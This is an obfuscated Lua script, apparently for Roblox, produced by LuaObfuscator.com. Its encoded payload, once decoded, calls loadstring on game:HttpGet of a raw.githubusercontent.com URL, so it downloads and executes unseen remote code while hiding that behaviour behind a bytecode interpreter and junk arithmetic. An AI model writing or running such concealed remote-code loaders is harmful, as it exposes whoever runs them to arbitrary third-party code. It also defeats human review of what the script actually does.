--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v125=v5(v87,v19);v19=nil;return v125;else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=0;local v89;while true do if (v88==(927 -(214 + 713))) then v89=(v31/((5 -3)^(v32-1)))%((5 -(1 + 2))^(((v33-(878 -(282 + (1552 -(892 + 65))))) -(v32-(1638 -(1523 + 114)))) + 1 + 0)) ;return v89-(v89%(1 -0)) ;end end else local v90=1065 -(68 + 997) ;local v91;while true do if (v90==(0 -0)) then v91=(621 -(555 + (152 -88)))^(v32-1) ;return (((v31%(v91 + v91))>=v91) and (932 -(857 + 74))) or ((1049 -481) -(367 + 201)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==((0 -0) -0)) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;v35=351 -(87 + 263) ;end if (v35==(181 -(67 + 113))) then return (v37 * (188 + 68)) + v36 ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if ((1 + (0 -0))==v38) then return (v42 * (16778213 -(915 + 82))) + (v41 * (185570 -120034)) + (v40 * (559 -303)) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (3 -0) );v18=v18 + 4 + 0 ;v38=(810 -(10 + 8)) -(368 + (1626 -1203)) ;end end end local function v24() local v43=v23();local v44=v23();local v45=443 -(416 + 26) ;local v46=(v20(v44,3 -2 ,9 + 11 ) * ((3 -1)^(470 -(145 + 293)))) + v43 ;local v47=v20(v44,451 -((1467 -(630 + 793)) + 386) ,1517 -(998 + 488) );local v48=((v20(v44,(37 -26) + 21 )==(1 + (0 -0))) and  -(773 -(201 + 571))) or (1139 -(116 + 1022)) ;if (v47==(0 -0)) then if (v46==(0 + 0 + 0)) then return v48 * ((0 -0) -0) ;else v47=3 -2 ;v45=0;end elseif (v47==(2906 -((1446 -632) + 45))) then return ((v46==(0 -0)) and (v48 * (((1914 -(1789 + 124)) + 0)/(766 -(745 + 21))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((1 + (1081 -(1020 + 60)))^(937 -(261 + 624))))) ;end local function v25(v49) local v50=0 + 0 ;local v51;local v52;while true do if (v50==(5 -3)) then v52={};for v111=3 -(2 -0) , #v51 do v52[v111]=v2(v1(v3(v51,v111,v111)));end v50=1 + 2 ;end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1056 -(87 + 968)) );v18=v18 + v49 ;v50=8 -6 ;end if (v50==(3 + 0)) then return v6(v52);end if (v50==0) then v51=nil;if  not v49 then local v117=(0 -0) -(701 -(376 + 325)) ;while true do if (v117==(1413 -(447 + 966))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=(520 + 1298) -(1703 + 114) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0 -0 ;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if (v92==(0 -0)) then local v118=(function() return 1905 -(1881 + 24) ;end)();local v119=(function() return;end)();while true do if (v118==(0 -0)) then v119=(function() return 1763 -(454 + 1309) ;end)();while true do if (v119==(1 + 0)) then v92=(function() return  #"}";end)();break;end if (v119==0) then v93=(function() return v94();end)();v95=(function() return nil;end)();v119=(function() return 1 -0 ;end)();end end break;end end end if (v92~= #".") then else if (v93== #",") then v95=(function() return v94()~=0 ;end)();elseif (v93==(2 -0)) then v95=(function() return v96();end)();elseif (v93~= #"xnx") then else v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v54=(function() return function(v100,v101,v102) local v103=(function() return 0 -0 ;end)();while true do if (v103==0) then local v121=(function() return 0 -0 ;end)();while true do if (v121==(341 -(218 + 123))) then v100[v101-#"." ]=(function() return v102();end)();return v100,v101,v102;end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #".",v59 do FlatIdent_40CF,Type,v21,Cons,v24,v25,v60,v68=(function() return v53(FlatIdent_40CF,Type,v21,Cons,v24,v25,v60,v68);end)();end v58[ #"gha"]=(function() return v21();end)();for v69= #"/",v23() do local v70=(function() return v21();end)();if (v20(v70, #"\\", #".")==(285 -(134 + 151))) then local v107=(function() return 1665 -(970 + 695) ;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107~=(1 -0)) then else local v122=(function() return 1990 -(582 + 1408) ;end)();while true do if ((3 -2)==v122) then v107=(function() return 562 -(306 + 254) ;end)();break;end if (v122~=(0 + 0)) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(0 -0)) then local v170=(function() return 1467 -(899 + 568) ;end)();local v171=(function() return;end)();while true do if (v170==0) then v171=(function() return 0 -0 ;end)();while true do if (v171==(0 + 0)) then v110[ #"gha"]=(function() return v22();end)();v110[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v108== #">") then v110[ #"-19"]=(function() return v23();end)();elseif (v108==(7 -5)) then v110[ #"xxx"]=(function() return v23() -((605 -(268 + 335))^(306 -(60 + 230))) ;end)();elseif (v108~= #"gha") then else local v178=(function() return 1824 -(1195 + 629) ;end)();local v179=(function() return;end)();while true do if (v178==0) then v179=(function() return 0;end)();while true do if (v179~=(0 -0)) then else v110[ #"gha"]=(function() return v23() -((243 -(187 + 54))^(1472 -(282 + 1174))) ;end)();v110[ #"http"]=(function() return v22();end)();break;end end break;end end end v122=(function() return 781 -(162 + 618) ;end)();end end end if ((814 -(569 + 242))~=v107) then else if (v20(v109, #"19(", #"-19")== #",") then v110[ #"xnxx"]=(function() return v60[v110[ #"0313"]];end)();end v55[v69]=(function() return v110;end)();break;end if (v107~=(0 -0)) then else local v124=(function() return 0 + 0 ;end)();while true do if ((1 + 0)==v124) then v107=(function() return 1 + 0 ;end)();break;end if (v124==(1251 -(721 + 530))) then v108=(function() return v20(v70,3 -1 , #"91(");end)();v109=(function() return v20(v70, #"0313",1277 -(945 + 326) );end)();v124=(function() return 1 -0 ;end)();end end end if (v107==2) then if (v20(v109, #"\\", #"/")~= #"|") then else v110[1 + 1 ]=(function() return v60[v110[1638 -(1373 + 263) ]];end)();end if (v20(v109,1002 -(451 + 549) ,1 + 1 )== #"|") then v110[ #"91("]=(function() return v60[v110[ #"91("]];end)();end v107=(function() return 3;end)();end end end end for v71= #"]",v23() do v56,v71,v28=(function() return v54(v56,v71,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[(1439 -(542 + 196)) -(271 + 429) ];local v66=v62[(3 -1) + 0 ];local v67=v62[1503 -(1408 + 92) ];return function(...) local v72=v65;local v73=v66;local v74=v67;local v75=v27;local v76=1087 -(461 + 625) ;local v77= -(1289 -(993 + 295));local v78={};local v79={...};local v80=v12("#",...) -(1172 -(213 + 205 + 753)) ;local v81={};local v82={};for v104=0,v80 do if ((v104>=v74) or (2874<2181)) then v78[v104-v74 ]=v79[v104 + 1 + 0 ];else v82[v104]=v79[v104 + 1 + 0 ];end end local v83=(v80-v74) + 1 + 0 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 + 0 + 0 ];if (v85<=((1401 -869) -(406 + (315 -192)))) then if ((v85<=(1770 -(1749 + 20))) or (2689<=343)) then if (v85==0) then do return;end else local v130=v84[1 + 1 ];local v131,v132=v75(v82[v130](v13(v82,v130 + (1323 -(1249 + 73)) ,v84[2 + 1 ])));v77=(v132 + v130) -(1146 -((2017 -(1126 + 425)) + 679)) ;local v133=0 -0 ;for v163=v130,v77 do local v164=(405 -(118 + 287)) -0 ;while true do if (v164==(1900 -(106 + 1794))) then v133=v133 + 1 ;v82[v163]=v131[v133];break;end end end end elseif ((v85>(1 + 1)) or (1869==2009)) then local v134=v84[(3 -2) + 1 ];local v135=v82[v84[8 -5 ]];v82[v134 + (2 -1) ]=v135;v82[v134]=v135[v84[(1239 -(118 + 1003)) -(4 + 110) ]];else local v139;local v140,v141;local v142;local v143;v82[v84[586 -(57 + 527) ]]={};v76=v76 + (1428 -(41 + 1386)) ;v84=v72[v76];v82[v84[105 -(17 + 86) ]]=v64[v84[3]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v64[v84[3]];v76=v76 + 1 + (0 -0) ;v84=v72[v76];v143=v84[3 -1 ];v142=v82[v84[3]];v82[v143 + (2 -1) ]=v142;v82[v143]=v142[v84[170 -(122 + 44) ]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2 -0 ]]=v84[9 -6 ];v76=v76 + (378 -(142 + 235)) ;v84=v72[v76];v143=v84[2 + 0 ];v140,v141=v75(v82[v143](v13(v82,v143 + 1 + 0 ,v84[5 -2 ])));v77=(v141 + v143) -(66 -(30 + (158 -123))) ;v139=0 + 0 ;for v165=v143,v77 do v139=v139 + (1258 -(1043 + 214)) ;v82[v165]=v140[v139];end v76=v76 + ((1 + 2) -2) ;v84=v72[v76];v143=v84[2];v82[v143]=v82[v143](v13(v82,v143 + (1213 -((1300 -(553 + 424)) + 889)) ,v77));v76=v76 + (2 -1) ;v84=v72[v76];v82[v84[2]]();v76=v76 + (581 -(361 + 219)) ;v84=v72[v76];do return;end end elseif ((v85<=(325 -(53 + 267))) or (3546<2322)) then if (v85==(1 + 3)) then local v158=v84[415 -(15 + 398) ];v82[v158]=v82[v158](v13(v82,v158 + (983 -(18 + 964)) ,v77));else v82[v84[7 -5 ]]={};end elseif ((v85<=(4 + 2)) or (2082==4773)) then v82[v84[2 + 0 ]]=v64[v84[3]];elseif (v85==(857 -(20 + (1569 -739)))) then v82[v84[2 + 0 ]]=v84[129 -(103 + 13 + 10) ];else v82[v84[1 + 1 ]]();end v76=v76 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403683Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A7573746172616E646F6D6775792D75782F49646B2D776861742D6E616D652D2F726566732F68656164732F6D61696E2F4D692Q6C696F6E616972652532307468617425334600094Q00027Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);